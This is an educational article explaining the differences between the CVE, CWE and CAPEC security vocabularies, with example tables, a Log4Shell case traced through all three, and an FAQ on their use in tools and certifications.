CVE Chapter

CVE vs CWE vs CAPEC: What's the Difference?

Jul 3, 2026 · 9 min read · Beginner

The Big Picture

If you have spent any time in cybersecurity, you have almost certainly seen the acronyms CVE, CWE, and CAPEC used — sometimes interchangeably, but they describe very different things. Understanding each one and how they relate helps you think more clearly about vulnerabilities, fix root causes, and communicate with security tools and compliance frameworks.

Here is the simplest possible summary:

All three are maintained by MITRE Corporation under US government contracts. They form a layered security vocabulary used by government agencies, security tools, compliance frameworks, and vulnerability researchers worldwide.

CVE — Common Vulnerabilities and Exposures

A CVE is a unique, public identifier for a specific security vulnerability in a specific product or version. The format is CVE-YEAR-NUMBER, for example CVE-2021-44228 for Log4Shell.

CVE entries contain:

CVEs answer the question: "Is my software vulnerable to this specific known bug?"

Who assigns CVEs? MITRE and a network of over 400 organisations called CVE Numbering Authorities (CNAs). Vendors like Microsoft, Google, and Cisco are CNAs and assign their own CVEs directly.

CWE — Common Weakness Enumeration

A CWE describes a category of software or hardware weakness — the type of mistake in code or design that leads to vulnerabilities. CWEs are not tied to a specific product; they describe patterns that appear across thousands of CVEs.

Examples of widely referenced CWEs:

CWE IDNameDescription
CWE-79Cross-site Scripting (XSS)Improper neutralisation of input in web pages
CWE-89SQL InjectionUser input inserted into SQL queries without sanitisation
CWE-787Out-of-bounds WriteWriting data past the end of a buffer (buffer overflow)
CWE-22Path TraversalAllowing user input to navigate outside intended directories
CWE-917Expression Language InjectionUser-controlled input evaluated in an expression language (Log4Shell's CWE)
CWE-502Deserialization of Untrusted DataDeserialising data from untrusted sources without validation
CWE-200Exposure of Sensitive InformationSoftware exposes data to unauthorised actors

CWEs answer the question: "What class of coding mistake caused this vulnerability, and how do we prevent it in future code?"

MITRE organises CWEs in a hierarchy. At the top are abstract Pillars (like "Improper Input Validation"), then Classes, then Base weaknesses (specific enough to map to specific CVEs), then Variants (very specific conditions). The NVD typically maps CVEs to Base-level CWEs.

OWASP Top 10 and CWE

The OWASP Top 10 — the most-referenced web security risk list — maps directly to CWEs. For example, "A03: Injection" covers CWE-89 (SQL), CWE-77 (Command), and CWE-79 (XSS). This is why understanding CWEs makes OWASP compliance much easier to reason about.

CAPEC — Common Attack Pattern Enumeration and Classification

CAPEC (pronounced "cape-eck") describes how attackers exploit weaknesses. While CWE describes the flaw in the code, CAPEC describes the attacker's methodology and technique used to abuse it.

CAPEC entries include:

Some examples of CAPEC entries:

CAPEC IDNameRelated CWE
CAPEC-66SQL InjectionCWE-89
CAPEC-86XSS via HTTP Request HeadersCWE-79
CAPEC-62Cross Site Request Forgery (CSRF)CWE-352
CAPEC-100Overflow BuffersCWE-119, CWE-787
CAPEC-560Use of Known Domain CredentialsCWE-522
CAPEC-17Using Malicious FilesCWE-434

CAPEC answers the question: "How would an attacker actually exploit this type of weakness, step by step?"

CAPEC is heavily used in threat modelling exercises, red team planning, and in frameworks like MITRE ATT&CK (which describes adversary tactics and techniques at an even higher level).

How CVE, CWE, and CAPEC Connect

The three systems form a chain from abstract attack technique down to a specific exploitable instance in production software.

CAPEC
Attack technique
CWE
Code weakness
CVE
Specific vuln instance

Attacker uses a technique → exploits a weakness class → targets a specific vulnerable product

For example:

Security tools use these links in both directions. A SAST (static analysis) tool might flag CWE-79 in code — before any CVE exists. A vulnerability scanner might find CVE-2023-XXXXX — and then surface the CWE to help the developer understand the root cause. A threat modelling tool might start from CAPEC-86 and ask "which CWEs could enable this attack, and do we have any CVEs for those in our stack?"

Real-World Example: Log4Shell

Let's trace Log4Shell through all three frameworks to make this concrete.

FrameworkEntryWhat it tells you
CVECVE-2021-44228Apache Log4j 2.x before 2.15.0 allows remote code execution via JNDI lookup in log messages. CVSS 10.0 Critical.
CWECWE-917: Expression Language InjectionThe root cause is that Log4j evaluates user-supplied strings as expression language. The fix is to not evaluate untrusted input as code — a general principle applicable to all software.
CAPECCAPEC-35: Leverage Executable Code in Non-Executable FilesThe attack technique is embedding executable payloads (JNDI strings) into data that the target will process. Defenders should monitor for JNDI:// strings in log inputs.

A developer who understands only the CVE knows to patch Log4j. A developer who understands the CWE knows to never evaluate untrusted strings as expressions in any language or framework. A security architect who understands the CAPEC knows to look for similar injection points across all logging and input-processing code — not just Log4j.

Side-by-Side Comparison

DimensionCVECWECAPEC
Full nameCommon Vulnerabilities and ExposuresCommon Weakness EnumerationCommon Attack Pattern Enumeration and Classification
What it describesA specific vulnerability in a specific productA class of coding or design weaknessAn attack technique or methodology
Maintained byMITRE + CNAsMITREMITRE
ID formatCVE-YEAR-NUMBERCWE-NUMBERCAPEC-NUMBER
ExampleCVE-2021-44228 (Log4Shell)CWE-917 (EL Injection)CAPEC-35 (Code in Non-Executable Files)
Total entries (2026)250,000+900+500+
Used byPatch management, vulnerability scannersSAST tools, OWASP, secure coding standardsThreat modelling, red teams, ATT&CK
AnswersIs this software vulnerable?Why is this type of code unsafe?How do attackers exploit this?

Frequently Asked Questions

What is the difference between CVE and CWE?
A CVE is a specific vulnerability instance in a specific product (e.g., a buffer overflow in Apache 2.4.51). A CWE is the class of weakness that caused it (e.g., CWE-787 Out-of-bounds Write). One CWE can explain thousands of different CVEs.
What is CAPEC?
CAPEC (Common Attack Pattern Enumeration and Classification) describes how attackers exploit weaknesses. Where CWE describes the flaw in code, CAPEC describes the technique used to attack it. CAPEC-66, for example, describes SQL injection attacks.
Who maintains CVE, CWE, and CAPEC?
All three are maintained by MITRE Corporation under a US government contract. CVE is at cve.mitre.org, CWE at cwe.mitre.org, and CAPEC at capec.mitre.org.
How do CVE, CWE, and CAPEC work together?
They form a layered model: CAPEC describes attack techniques, CWE describes the code-level weaknesses attackers exploit, and CVE records specific vulnerable software instances. Together they link attack methods to root causes to real-world vulnerabilities.
Do I need to know all three for a security certification?
For CompTIA Security+, CEH, and CISSP you need to understand CVE and CWE. CAPEC is referenced in advanced threat modelling certifications and the MITRE ATT&CK framework. For most practitioners, CVE and CWE are the daily essentials.